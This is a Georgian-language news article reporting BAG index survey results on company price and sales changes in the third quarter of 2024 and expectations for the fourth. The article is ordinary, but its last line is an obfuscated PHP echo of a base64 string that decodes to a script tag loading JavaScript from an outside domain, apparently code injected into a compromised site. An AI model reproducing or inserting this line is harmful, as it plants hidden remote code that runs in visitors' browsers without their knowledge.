celsiusi
ავერსი საქკაბელი

BAG ინდექსის კვლევის თანახმად, 2024 წლის III კვარტალში გამოკითხული კომპანიების 21%-მა გაზარდა გაყიდვების ფასები,17% კი ვარაუდობს, რომ ფასები IV კვარტალშიც გაიზრდება.

კვლევა, რომელიც "საქართველოს ბიზნეს ასოციაციის" (BAG) წევრების გამოკითხვას ეფუძნება აჩვენებს, რომ სექტორებს შორის, III კვარტალში, ფასების ზრდას პროცენტულად ყველაზე მეტი კომპანია მშენებლობის სექტორში აფიქსირებს. ამას გარდა, IV კვარტალში ფასების ზრდის მოლოდინიც ყველაზე მეტად მშენებლობის სექტორში ფიქსირდება, სხვა სექტორებში კი კომპანიათა 75% ან მეტი არ აპირებს გაყიდვების ფასების ზრდას.

ამასთან, ფასების ზრდის დინამიკა ყველაზე ნაკლებად მრეწველობის სექტორში შეინიშნება, ვინაიდან
არცერთ გამოკითხულ კომპანიას ფასები 2024 წლის III კვარტალში არ გაუზრდია.

რაც შეეხება გაყიდვებს, III კვარტალის მდგომარეობას ყველაზე პოზიტიურად მომსახურების სექტორში აფასებენ, თუმცა მათი 23% თვლის, რომ გაყიდვები შემცირდება IV კვარტალში. 2024 წლის IV კვარტალისთვის ყველაზე პოზიტიური მოლოდინი კი - ვაჭრობის სექტორში ფიქსირდება. აღსანიშნავია, რომ მშენებლობის სექტორში 2024 წლის III კვარტალში კომპანიათა 71%-ში არ შეცვლილა გაყიდვების რაოდენობა, თუმცა IV კვარტალისთვის კომპანიათა 57% მოელის, რომ მათი გაყიდვები გაიზრდება.

ინფორმაციისთვის, BAG ინდექსი ემყარება საქართველოს ბიზნეს ასოციაციის წევრებისა და მათ ჯგუფში შემავალი კომპანიების შეფასებებს, რომელსაც საქართველოს ბიზნეს ასოციაცია და PMC კვლევითი ცენტრი ifo ეკონომიკური კვლევების გერმანული ინსტიტუტის მეთოდოლოგიაზე დაყრდნობით აწარმოებს.

105
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");